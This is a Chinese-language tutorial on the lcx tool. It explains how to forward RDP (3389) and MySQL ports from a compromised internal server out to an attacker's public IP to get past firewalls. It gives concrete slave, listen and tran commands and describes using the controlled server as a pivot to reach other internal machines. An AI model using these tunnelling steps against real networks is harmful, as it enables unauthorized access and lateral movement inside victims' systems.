lcx工具使用

0x01 为什么要作端口转发？

如果外网服务器，我们直接连接其端口就能进行访问，不需要进行端口转发。所以端口转发常用于穿透防火墙。

0x02 快速使用

前提:你的计算机处于公网,被控制的计算机能访问外网

一般情况连接内网的3389需要4步：

1：确定被控制计算机的内网ip

2：被控制的计算机执行”lcx -slave 你的计算机ip 51 被控制计算机的ip 3389”

3：本机执行”lcx -listen 34 2389”

4：用mstsc 连接“127.0.0.1:2389”

在本机上运行：

lcx –listen 34 2389,说明一下这句指令的意思，这句话的意思就是监听本机的34端口然后将数据转发到2389端口，当然这里的34 2389端口是依心情而定，但是，必须要注意这些端口也不能使用那些本机已经开放的端口。

内网服务器上运行：（拿到可执行权限作如下操作）

我假设：219.222.181.181为我自己的ip，192.168.0.2 3389为内网服务器的ip。

说说这句话的意思：slave为奴隶的意思，顾名思义，即内网服务器甘愿将自己的3389给219.222.181.181的34端口！

连接：现在所有步骤都完成了，就等着你进行连接了，不要告诉我到这个时候你还是不会连哦，到手的服务器都不要吗？

0x03 了解工具

这是lcx使用说明

Lcx有两大功能，一个是端口转发(listen和slave成对使用)，另一个是端口映射(tran)。

端口转发：

Lcx -Listen <监听slave请求的端口(对应slave 的第二个参数)> <等待连接的端口>

Lcx -slave <你的ip> <监听端口(对应listen的第一个参数)> <目标ip> <目标端口>

所以既然我们只需要连接那台服务器，我们只需要设置目标ip参数为127.0.0.1就好了(127.0.0.1 Localhost 即本机)因为别忘了slave是在对面服务器执行的。当然了这里补充一点目标端口号是可以换的比如3306这样你就可以连接对面的MySQL数据库了。有些人肯定要问了如果把这个127.0.0.1换成其他的ip会怎么样，如果你尝试过了那么恭喜你发现了新功能，你可以访问更多的3389。

1、本机执行lcx -listen 40050 10000

2、被控制服务器执行 lcx -slave 1.1.1.1 40050 10.10.0.3 3389

3、连接成功之后中间就出现了一条通道，可以互相传输数据

4、我们打开mstsc 输入127.0.0.1:10000

Ok，这样我们就能访问内网的其他机子了，理论上来说被控制的服务器能访问到的我们都能访问，其实就是以被攻击的服务器做跳板。扩展一点讲，还记得listen的参数么？第一个是监听slave请求的端口，另一个监听端口，这个监听端口我们可以访问，当然别人也可以访问(一般用来共享)。

在1.1.1.1做好监听并且对面执行slave且成功的话1.1.1.2和1.1.1.3就可以用mstsc连接1.1.1.1:10000来访问到对面10.10.0.3的3389了。

端口映射：

Lcx -tran <等待连接的端口> <目标ip> <目标端口>

Lcx -tran 1920 127.0.0.1 21

这样我访问本机的1920端口就能访问到本机的ftp了，当然把127.0.0.1换成其他的ip都可以。

0x04 参考链接：

http://www.freebuf.com/sectool/126967.html